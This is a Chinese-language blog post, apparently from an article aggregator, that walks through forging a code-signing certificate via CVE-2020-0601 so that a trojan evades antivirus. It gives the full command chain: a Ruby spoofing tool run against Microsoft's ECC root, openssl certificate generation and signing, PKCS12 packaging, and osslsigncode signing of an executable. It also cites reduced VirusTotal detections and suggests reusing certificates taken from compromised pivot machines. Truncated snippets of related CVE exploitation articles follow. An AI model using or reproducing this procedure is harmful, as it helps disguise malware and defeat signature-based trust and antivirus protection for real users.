利用CVE 2020 0601進行簽名偽造

2022-09-20 21:09:15 字數 1470 閱讀 3323

當我們的木馬生成好了,可以在稍微用一下簽名在靜態上過一過殺軟,常用的就是spy.py

當然,我們也可以用一下cve-2020-0601進行偽造簽名

執行我們的工具,ruby main.rb microsofteccproductrootcertificateauthority.cer,此時生成「spoofed_ca.key」檔案

然後我們在生成新的證書,openssl req -new -x509 -key spoofed_ca.key -out sign.crt

然後生成乙個新金鑰,openssl ecparam -name secp384r1 -genkey -noout -out sign.key

然後生成乙個新的證書簽名請求(csr),openssl req -new -key sign.key -out sign.csr -config openssl_cs.conf -reqexts v3_cs

最後使用我們的欺騙性ca和ca金鑰簽署新的csr,openssl x509 -req -in sign.csr -ca sign.crt -cakey spoofed_ca.key -cacreateserial -out sign.crt -days 1000 -extfile openssl_cs.conf -extensions v3_cs

將證書打包到乙個pkcs12檔案中,openssl pkcs12 -export -in sign.crt -inkey sign.key -certfile sign.crt -name "sign" -out cert.p12

osslsigncode sign -pkcs12 cert.p12 -n "signed" -pass 123456 -in /root/desktop/calc.exe -out /root/desktop/calc2.exe,利用簽名生成我們的檔案

然後在將原始的和籤了名的exe放在vt上簡單對比一下,少了一點

乙個tips,當拿下一些跳板機的時候,我們可以看看機器的證書,certlm.msc,因為用的是工具預設的證書,可能效果不是很理想,我們亦或者可以在用spy在籤一下名,當然,這些都是筆者的臆測,記錄一下

cve 2020 0601 漏洞原理淺述

該漏洞是微軟在2020年推出的第一批漏洞修復補丁中炒的最熱鬧的乙個,新年將至,寫一篇漏洞分析來湊個熱鬧,復現就算了,有緣人自會找到復現手段。本篇簡要講述cve 2020 0601漏洞的成因 我們先以ssl協議為例,來形容一下如何進行證書驗證,以及該漏洞是在 產生 步驟 步驟 這裡是觸發漏洞的地方,記...

CVE 2019 0708漏洞利用

漏洞平台披露 利用3389埠的rdp進行漏洞利用 影響系統 windows 7 windows2003 windows2008 windowsxp 等等,具體影響範圍看上面的鏈結 即可 漏洞利用 攻擊方 192.168.216.139 kali linux 靶機 192.168.216.138 wi...

kali下CVE 2017 8570利用復現實驗

參考 簡介 microsoft office容易出現遠端 執行漏洞。攻擊者可以利用此問題在當前登入的使用者的上下文中執行任意 漏洞嘗試可能會導致拒絕服務條件。影響範圍 microsoft office 2007 service pack 3 microsoft office 2010 service...